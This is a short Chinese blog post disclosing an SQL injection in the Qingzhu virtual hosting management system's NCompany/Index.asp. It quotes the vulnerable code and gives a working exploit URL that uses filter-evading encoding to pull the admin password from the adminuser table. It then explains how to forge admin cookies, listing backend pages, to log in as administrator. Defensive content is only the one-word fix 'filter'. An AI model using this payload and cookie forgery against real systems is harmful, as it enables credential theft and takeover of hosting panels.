清竹 虚拟主机管理系统sql注入 漏洞   NCompany\Index. asp  

loadfile_fromcache templatePath&"NCompany-Index.html"       '加载index.html模板

TempCon=TempCon&Application("Qz_TP_"&templatePath&"NCompany-Index.html")

Id=ReStrs(Request.QueryString("Id"))//过滤不严格

Set rs=Conn.Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//直接带入sql语句

Address=rs("Address")

TelInfo=rs("TelInfo")

 

    清竹虚拟主机管理系统sql注入 + 后台构造cookie登插图   exp:ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1       构造cookie:   AdminUser = 注入得来的adminuser   PassWord = 注入得来的adminpass   AdminExu = system.asp, jihua.asp, news_admin.asp, mailtemplate.asp, ads.asp, success.asp, ServerQQ.asp, member.asp, message.asp, agent_fenlei.asp, grade.asp, sendmail.asp, proclass.asp, domain.asp, domainbuy.asp, domainupdate.asp, hostlist.asp, hostbuy.asp, vpath.asp, bindcheck.asp, cert.asp, sqllist.asp, sqlbuy.asp, my_sqllist.asp, my_sqlbuy.asp, maillist.asp, mailbuy.asp, apppool.asp, scriptmaps.asp, serverlist.asp, apppoolmode.asp, serverdomain.asp, shopitem.asp, shoplist.asp, shopbuy.asp, money.asp, moneylog.asp, pay.asp, payonline.asp, domain_api.asp, password.asp, template.asp, links.asp   修复方案: 过滤

    上一篇: phpcms v9 SQL注入漏洞(第二弹) - 网站安全 - 自学

    下一篇: 新浪微博点击劫持刷粉丝 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《清竹虚拟主机管理系统sql注入 + 后台构造cookie登
   

还没有人抢沙发呢~